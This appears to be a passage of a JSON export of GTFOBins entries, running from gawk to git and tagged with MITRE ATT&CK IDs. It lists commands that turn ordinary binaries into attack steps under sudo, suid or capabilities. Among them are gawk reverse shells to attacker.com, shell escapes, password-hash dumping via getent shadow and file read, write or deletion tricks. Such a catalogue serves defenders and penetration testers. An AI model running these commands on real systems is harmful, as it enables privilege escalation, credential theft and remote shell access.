}'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-write:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:reverse-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:reverse-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:reverse-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gcc:file-read:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-read:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-read:1:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-read:1:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-write:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-write:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:shell:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:shell:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcloud:inherit:0:sudo","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcloud/"]},{"id":"gtfo:gcloud:inherit:0:suid","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcloud/"]},{"id":"gtfo:gcloud:inherit:0:unprivileged","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcloud/"]},{"id":"gtfo:gcore:file-read:0:sudo","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcore/"]},{"id":"gtfo:gcore:file-read:0:suid","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcore/"]},{"id":"gtfo:gcore:file-read:0:unprivileged","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcore/"]},{"id":"gtfo:gdb:file-write:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:file-write:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:file-write:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:inherit:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:inherit:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:inherit:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:capabilities","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex 'python import os; os.setuid(0)' -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gem:inherit:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:1:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:1:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:2:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:2:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:shell:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:shell:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:genie:shell:0:sudo","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genie/"]},{"id":"gtfo:genie:shell:0:suid","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genie/"]},{"id":"gtfo:genie:shell:0:unprivileged","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genie/"]},{"id":"gtfo:genisoimage:file-read:0:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:0:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:0:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:1:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:1:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:1:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:getent:privilege-escalation:0:sudo","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/getent/"]},{"id":"gtfo:getent:privilege-escalation:0:suid","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/getent/"]},{"id":"gtfo:ghc:shell:0:sudo","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghc/"]},{"id":"gtfo:ghc:shell:0:unprivileged","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghc/"]},{"id":"gtfo:ghci:shell:0:sudo","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghci/"]},{"id":"gtfo:ghci:shell:0:unprivileged","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghci/"]},{"id":"gtfo:gimp:inherit:0:sudo","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gimp/"]},{"id":"gtfo:gimp:inherit:0:unprivileged","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gimp/"]},{"id":"gtfo:ginsh:shell:0:sudo","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ginsh/"]},{"id":"gtfo:ginsh:shell:0:suid","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ginsh/"]},{"id":"gtfo:ginsh:shell:0:unprivileged","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ginsh/"]},{"id":"gtfo:git:file-read:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-read:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-read:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-write:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-write:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-write:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:0:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:1:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File 